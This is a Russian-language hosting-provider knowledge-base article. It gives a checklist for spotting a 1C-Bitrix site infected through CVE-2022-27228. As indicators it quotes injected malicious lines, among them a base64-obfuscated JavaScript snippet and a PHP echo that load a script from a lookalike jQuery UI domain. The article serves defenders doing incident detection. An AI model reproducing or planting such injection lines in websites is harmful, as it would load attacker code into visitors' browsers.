Авторизация на портале поддержки осуществляется в личном кабинете my.active.by (my.activecloud.ru), вкладка Поддержка.
Благодарим за понимание.
База знаний: Виртуальный хостинг (Bitrix)
Чек-лист для проверки сайта 1С-Битрикс на уязвимость
|
|
В данной статье содержится чек-лист, с помощью которого вы можете проверить факт заражения вашего сайта (CVE-2022-27228). 1. В каждой директории сайта появились файлы ".htaccess"
2. В списке агентов есть подобный агент с вредоносным кодом: 3. Отсутствует файл конфигурации "/bitrix/.settings.php"
4. Вы обнаружили изменения в главном индексном файле "index.php" 5. В конце файла "bitrix/modules/main/include/prolog.php" появилась лишняя строка: echo "<script src='****s://**de.jquery-uii.**m/jquery-ui.js'></script>"; 6. В конце файла "bitrix/js/main/core/core.js" появилась лишняя строка: s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s); 7. Наличие подозрительных вставок кода в файлах "bitrix/modules/main/bx_root.php" и "bitrix/modules/main/include/prolog_after.php" Важно!
В случае, если ваш сайт был взломан, вам необходимо обратиться к разработчику для очистки сайта от вредоносного кода и обновления CMS и всех модулей сайта (таким образом закрываются уязвимости кода).
| |
Если решение вопроса найти не удалось, Вы можете отправить нам заявку: |
Комментарии (0)